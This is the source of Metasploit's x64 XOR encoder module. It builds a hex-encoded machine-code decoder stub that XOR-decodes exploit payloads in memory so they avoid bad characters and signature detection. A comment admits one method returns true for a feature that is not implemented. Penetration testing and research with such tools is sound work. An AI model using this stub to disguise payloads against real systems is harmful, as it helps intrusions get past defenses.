Path: blob/master/modules/encoders/x64/xor.rb
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Encoder::Xor67def initialize8super(9'Name' => 'XOR Encoder',10'Description' => 'An x64 XOR encoder. Uses an 8 byte key and takes advantage of x64 relative addressing.',11'Author' => [ 'sf' ],12'Arch' => ARCH_X64,13'License' => MSF_LICENSE,14'Decoder' => {15'KeySize' => 8,16'KeyPack' => 'Q',17'BlockSize' => 818}19)20end2122# Indicate that this module can preserve some registers23# ...which is currently not true. This is a temp fix24# until the full preserve_registers functionality is25# implemented.26def can_preserve_registers?27true28end2930def decoder_stub(state)31# calculate the (negative) block count . We should check this against state.badchars.32block_count = [-(((state.buf.length - 1) / state.decoder_key_size) + 1)].pack('V')3334decoder = "\x48\x31\xC9" + # xor rcx, rcx35"\x48\x81\xE9" + block_count + # sub ecx, block_count36"\x48\x8D\x05\xEF\xFF\xFF\xFF" + # lea rax, [rel 0x0]37"\x48\xBBXXXXXXXX" + # mov rbx, 0x????????????????38"\x48\x31\x58\x27" + # xor [rax+0x27], rbx39"\x48\x2D\xF8\xFF\xFF\xFF" + # sub rax, -840"\xE2\xF4" # loop 0x1B4142state.decoder_key_offset = decoder.index('XXXXXXXX')4344return decoder45end46end474849